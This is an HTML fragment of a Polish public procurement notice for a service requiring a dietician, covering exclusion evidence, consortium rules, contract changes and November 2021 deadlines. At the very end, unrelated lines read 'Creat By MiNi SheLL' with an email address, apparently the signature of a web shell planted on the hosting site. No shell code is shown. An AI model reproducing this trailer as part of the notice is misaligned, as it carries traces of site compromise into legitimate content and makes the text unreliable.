<br/>c) Zamawiający wymaga, aby Wykonawca wykazał, że do realizacji zamówienia będzie dysponował co najmniej następującymi osobami:<br/>- 1 osobą posiadającą kwalifikacje zawodowe dietetyka <br/>2. Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie<br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów<br/>technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy<br/>może mieć negatywny wpływ na realizację zamówienia.<br/>3. Ocena spełnienia warunków udziału w postępowaniu oraz braku podstaw do wykluczenia<br/>Wykonawcy będzie dokonana w oparciu o złożone przez Wykonawcę oświadczenia i dokumenty<br/>(z zastrzeżeniem art. 128 ustawy Pzp).<br/>4. Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie postępowania<br/>o udzielenie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Składane na wezwanie Zamawiającego w trybie art. 274 ust. 1 ustawy Pzp:<br/>1) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do<br/>tej samej grupy kapitałowej;<br/>2) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawione nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że przed<br/>upływem terminu składania ofert Wykonawca dokonał płatności należnych podatków lub opłat wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3) zaświadczenie albo inny dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzający, że Wykonawca nie zalega z opłacaniem<br/>składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp,<br/>wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu<br/>składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub<br/>zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>4) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż<br/>3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji<br/>2. Podmioty zagraniczne:<br/>1) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,<br/>zamiast dokumentów, o którym mowa w ust. 1 pkt 2, 3 i 4, składa dokument lub dokumenty wystawione<br/>w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:<br/>a) nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie<br/>społeczne lub zdrowotne,<br/>b) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd,<br/>nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje<br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach<br/>miejsca wszczęcia tej procedury;<br/>2) jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt.1, zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób<br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma<br/>przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym,<br/>notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na<br/>siedzibę lub miejsce zamieszkania Wykonawcy;<br/>3) dokumenty i oświadczenia o których mowa w niniejszym ustępie powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Składane wraz z ofertą:<br/>1. zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów, w sytuacji, gdy Wykonawca polega na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby. Przykładowy wzór zobowiązania został zawarty w Załączniku nr 10 do SWZ.<br/>(UWAGA: dotyczy sytuacji, w której Wykonawca powołuje się na zasoby podmiotu udostępniającego<br/>zasoby w celu wykazania spełnienia warunków udziału w postępowaniu)<br/>2. oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego będzie<br/>wynikało, które usługi wykonają poszczególni Wykonawcy, w przypadku wykazania spełnienia<br/>warunków udziału w postępowaniu. Wzór oświadczenia zawarty jest w Załączniku nr 6 do SWZ.<br/>(UWAGA: dotyczy sytuacji ,gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia)<br/>Składane na wezwanie Zamawiającego w trybie art. 274 ust. 1 ustawy Pzp:<br/>1. wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich doświadczenia niezbędnego<br/>do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami. Zamawiający wymaga, aby Wykonawca wykazał, że do realizacji zamówienia będzie dysponował co najmniej następującymi osobami:- 1 osobą posiadającą kwalifikacje zawodowe dietetyka <br/><br/>2. wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi<br/>zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są<br/>wykonywane należycie. Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających<br/>się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające<br/>ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. W wykazie należy<br/>wskazać wyłącznie te usługi, które potwierdzają spełnienie warunku udziału w postępowaniu.<br/>3.	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami<br/>4.	zaświadczenie o wpisie do rejestru zakładów podlegających kontroli właściwego Państwowego Inspektora Sanitarnego,<br/>5.	decyzja właściwego państwowego inspektora sanitarnego zatwierdzająca zakład (firmę) do prowadzenia działalności na rynku spożywczym,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga w niniejszym postępowaniu złożenia przedmiotowych środków<br/>dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> OFERTA POWINNA ZAWIERAĆ: 1) formularz oferty sporządzony według wzoru stanowiącego<br/>Załącznik nr 2 do SWZ; 2) oświadczenie o<br/>niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu ; jeżeli dotyczy: także oświadczenia innych Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia oraz oświadczenie podmiotów udostępniających zasoby – jeżeli Wykonawca<br/>powołuje się na te zasoby; 3) (jeżeli dotyczy) oświadczenie Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia. 4) (jeżeli dotyczy) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów.; 5) dokument potwierdzający umocowanie osoby podpisującej ofertę<br/>do działania w imieniu Wykonawcy – odpis lub informację z Krajowego Rejestru Sądowego,<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu<br/>pierwszym, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych<br/>baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów<br/>formularzu oferty; 6) (jeżeli dotyczy) pełnomocnictwo, w przypadku podpisania oferty przez<br/>pełnomocnika –dotyczy to również przypadków składania oferty przez Wykonawców<br/>występujących wspólnie, czyli np. uczestników konsorcjum, wspólników spółki cywilnej.<br/>Pełnomocnictwo musi zawierać w swojej treści zakres umocowania oraz jednoznacznie określać<br/>czynności do których pełnomocnik jest upoważniony <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> udzielenie zamówienia:<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo należy dołączyć do oferty.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia nie muszą posiadać określonej<br/>formy prawnej w celu złożenia oferty.<br/>4. Zamawiający nie określa dla Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia wymagań związanych z realizacją zamówienia w inny sposób niż w odniesieniu do<br/>pojedynczych Wykonawców.<br/>5. Zapisy w SWZ oraz załącznikach dotyczące Wykonawcy stosuje się odpowiednio do<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>6. Zamawiający określa szczególny, obiektywnie uzasadniony, sposób spełniania przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunków udziału w<br/>postępowaniu:<br/>1) warunek określony w Rozdziale 6 ust. 1 pkt 4 lit. a będzie uznany za spełniony, jeżeli co<br/>najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaże<br/>posiadanie łącznego doświadczenia określonego w tym warunku (tj. Zamawiający nie dopuszcza<br/>możliwości sumowania doświadczenia Wykonawców) i wykona usługi, do realizacji których te<br/>zdolności są wymagane;<br/>2)	warunek określony w Rozdziale 6 ust. 1 pkt 4 lit. b będzie uznany za spełniony, jeżeli jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaże, że samodzielnie dysponuje wymaganym potencjałem technicznym, bądź wielu Wykonawców łącznie i wykonają usługi, do realizacji których ten potencjał jest wymagany.<br/>3)	warunek określony w Rozdziale 6 ust. 1 pkt 4 lit. c będzie uznany za spełniony, jeżeli jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaże, że samodzielnie dysponuje wymaganym potencjałem osobowym, bądź wielu Wykonawców łącznie i wykonają usługi, do realizacji których te zdolności są wymagane<br/>7. Brak podstaw do wykluczenia musi wykazać każdy z Wykonawców oddzielnie.<br/>8. W przypadku wspólnego wykazywania spełnienia warunków udziału w postępowaniu<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi<br/>Załącznik nr 6 do SWZ.<br/>9. Jeżeli w niniejszym postępowaniu zostanie wybrana oferta Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, Zamawiający będzie żądał przed zawarciem umowy<br/>w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>10. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych<br/>Wykonawców kluczowych zadań dotyczących realizacji usługi.<br/>11. Po złożeniu oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem<br/>wyznaczonym do reprezentowania Wykonawców.<br/>12. Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia składa oddzielnie<br/>wraz z ofertą oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, którego wzór stanowi Załącznik nr 4 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1)	zmiany podwykonawców, w szczególności zmiany albo rezygnacji z podwykonawcy, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy Pzp. Zmiana Umowy odbywa się na zasadach określonych w § 10 ust. 4 i 5;<br/>2)	zmiany wysokości wynagrodzenia Wykonawcy w przypadku:<br/>a)	zmiany stawki podatku od towarów i usług;<br/>b)	zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę;<br/>c)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;<br/>d)	zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych;<br/>- pod warunkiem wykazania Zamawiającemu, że zmiany będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę oraz wykazania przez Wykonawcę tych dodatkowych kosztów na zasadach określonych w § 17.<br/>3)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy,<br/>4)	zmiany rachunku bankowego, o którym mowa w § 5 ust. <br/>5)	zajdzie konieczność świadczenia usługi w okresie wakacyjnym lub w czasie przerw od zajęć,<br/>6) w razie rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie odpowiednio pomniejszone.;<br/>7) w razie zwiększenia zapotrzebowania na posiłki w okresie, w jakim usługa miała nie być świadczona lub miała nastąpić przerwa w jej realizacji, względnie w przypadku przedłużenia terminu jej realizacji w okresie wakacyjnym pod warunkiem zachowania cen jednostkowych, ustalonych w ramach rzeczonego postępowania o udzielenie zamówienia publicznego.<br/>2.	Gdy nowy wykonawca ma zastąpić dotychczasowego wykonawcę: <br/>a) w wyniku sukcesji, wstępując w prawa i obowiązki wykonawcy, w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów ustawy, <br/>b) w wyniku przejęcia przez zamawiającego zobowiązań wykonawcy względem jego podwykonawców, w przypadku, o którym mowa w art. 465 ust. 1 Ustawy Pzp;<br/><br/>3.	W następujących okolicznościach:<br/>1) zmiany dotyczą realizacji dodatkowych usług od dotychczasowego wykonawcy, nieobjętych zamówieniem podstawowym, o ile stały się niezbędne i zostały spełnione łącznie następujące warunki:<br/>a) zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności dotyczących zamienności lub interoperacyjności wyposażenia, usług lub instalacji, zamówionych w ramach zamówienia podstawowego,<br/>b) zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla zamawiającego,<br/>c) wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy, z wyjątkiem należycie uzasadnionych przypadków.<br/>4. Jeżeli konieczność zmiany umowy spowodowana jest okolicznościami, których zamawiający, działając z należytą starannością, nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej<br/>5. Łączna wartość zmian jest mniejsza niż progi unijne oraz jest niższa niż 10% wartości zamówienia określonej pierwotnie w umowie, a zmiany te nie powodują zmiany ogólnego charakteru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego równiez na miniPortalu.Formularz do zaszyfrowania oferty przez Wykonawcę jest dostepny dla wykonawców na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-30 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. 1) Zamawiający, zgodnie z art. 95 ust. 1 ustawy Pzp, wymaga, aby wszystkie osoby<br/>wykonujące czynności związane z realizacją zamówienia, polegające na wykonywaniu pracy w<br/>sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.– Kodeks pracy (t.j. Dz.U. z<br/>2020 r., poz. 1320 z późn. zm.) były zatrudnione przez Wykonawcę lub podwykonawcę na<br/>podstawie stosunku pracy w całym okresie realizacji zamówienia. Zamawiający nie wymaga<br/>zatrudnienia tych osób na pełny etat. Zamawiający dopuszcza, aby Wykonawca lub<br/>podwykonawca będący osobą fizyczną, która prowadzi jednoosobową działalność gospodarczą<br/>osobiście wykonywał czynności związane z realizacją zamówienia.<br/>2) Rodzaj czynności związanych z realizacją zamówienia, których dotyczą wymagania<br/>zatrudnienia na podstawie stosunku pracy: - 1 osoba posiadająca kwalifikacje zawodowe dietetyka <br/><br/><br/><br/>2. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w<br/>szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o<br/>informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2020 r., poz.<br/>346 ze zm.), o ile Wykonawca wskazał w Formularzu oferty, stanowiącym załącznik nr 2 do SWZ<br/>dane umożliwiające dostęp do tych środków.<br/>3. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.

Creat By MiNi SheLL
Email: jattceo@gmail.com